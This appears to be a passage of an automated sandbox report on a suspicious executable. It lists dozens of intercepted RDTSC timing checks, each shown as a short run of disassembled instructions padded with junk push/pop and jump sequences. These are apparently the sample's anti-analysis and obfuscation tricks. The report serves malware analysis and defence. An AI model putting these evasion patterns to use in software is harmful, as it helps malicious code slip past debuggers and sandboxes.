Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1B8B second address: 16E1BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jns 00007FEEDCB2F2E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1BAB second address: 16E1BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1E39 second address: 16E1E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1E3D second address: 16E1E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1E4B second address: 16E1E55 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1E55 second address: 16E1EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEDCB1F6E2h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e xor ecx, 14B77DE2h 0x00000014 or di, 0827h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEEDCB1F6D8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 push 840C40EEh 0x0000003a push eax 0x0000003b push edx 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16E1EA4 second address: 16E1EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1703CC8 second address: 1703CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1703CCC second address: 1703CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1703CD2 second address: 1703CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D1AFF second address: 16D1B13 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB2F2EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FEEDCB2F2E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1701A68 second address: 1701A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1701A6E second address: 1701A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1701A72 second address: 1701A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1701A7C second address: 1701A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1701D57 second address: 1701D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEEDCB1F6D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702320 second address: 170232A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEEDCB2F2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170232A second address: 1702341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702341 second address: 1702345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702345 second address: 1702349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702498 second address: 17024CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F7h 0x00000007 jmp 00007FEEDCB2F2EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FEEDCB2F2E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702610 second address: 1702616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702616 second address: 170261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170261F second address: 170264F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FEEDCB1F6E7h 0x0000000e push edi 0x0000000f jmp 00007FEEDCB1F6DAh 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170264F second address: 1702655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702655 second address: 1702659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17028EC second address: 1702904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB2F2F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702904 second address: 1702908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702908 second address: 170290C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702A7B second address: 1702A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702A81 second address: 1702A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702A85 second address: 1702A9D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FEEDCB1F6DEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702A9D second address: 1702AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702AB1 second address: 1702ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702ABB second address: 1702ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1702ABF second address: 1702ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16D36B1 second address: 16D36B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17033CE second address: 17033D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17037B9 second address: 17037C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17037C2 second address: 17037C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17037C9 second address: 170380A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FEEDCB2F2E6h 0x00000009 jmp 00007FEEDCB2F2ECh 0x0000000e jmp 00007FEEDCB2F2EEh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FEEDCB2F2E6h 0x0000001c jmp 00007FEEDCB2F2F5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170380A second address: 1703841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E3h 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 16C464C second address: 16C4656 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170AD10 second address: 170AD1E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170B31D second address: 170B321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170B321 second address: 170B32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FEEDCB1F6D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1709B63 second address: 1709B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1709B7B second address: 1709B80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1709B80 second address: 1709B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1709B8C second address: 1709BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEEDCB1F6E5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170FE11 second address: 170FE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170F426 second address: 170F443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007FEEDCB1F6D6h 0x0000000e jmp 00007FEEDCB1F6DDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170F443 second address: 170F449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170F449 second address: 170F44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170FC68 second address: 170FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 170FC6F second address: 170FC75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711097 second address: 17110B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEDCB2F2F2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17110B4 second address: 17110BE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17110BE second address: 17110E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEDCB2F2E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17110E0 second address: 17110E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17110E6 second address: 17110EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17110EC second address: 171113E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jnp 00007FEEDCB1F6E6h 0x00000012 jmp 00007FEEDCB1F6E0h 0x00000017 pop eax 0x00000018 mov dword ptr [ebp+122DB60Fh], edi 0x0000001e call 00007FEEDCB1F6E6h 0x00000023 mov si, bx 0x00000026 pop edi 0x00000027 call 00007FEEDCB1F6D9h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 pop esi 0x00000032 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 171113E second address: 1711148 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711148 second address: 1711152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEEDCB1F6D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711152 second address: 171115F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 171115F second address: 171116C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FEEDCB1F6D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 171116C second address: 1711180 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711180 second address: 17111CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FEEDCB1F6E1h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FEEDCB1F6E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17111CC second address: 17111DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17117A7 second address: 17117AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17117AB second address: 17117B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17117B1 second address: 17117B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711C88 second address: 1711C8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711D41 second address: 1711D7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FEEDCB1F6D8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1C0Ah], ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jp 00007FEEDCB1F6D8h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711D7D second address: 1711D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711D83 second address: 1711D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711D87 second address: 1711D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711DDD second address: 1711DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711DE1 second address: 1711DFB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEEDCB2F2ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FEEDCB2F2E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711DFB second address: 1711DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711FD1 second address: 1711FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2ECh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 1711FE5 second address: 1711FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127B6 second address: 17127BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127BA second address: 17127BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127BE second address: 17127D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEEDCB2F2E8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127D4 second address: 17127D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127D8 second address: 17127F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exe | RDTSC instruction interceptor: First address: 17127F1 second address: 1712866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FEEDCB1F6D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1F45h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FEEDCB1F6D8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 jnp 00007FEEDCB1F6DCh 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007FEEDCB1F6D8h 0x00000057 rdtsc
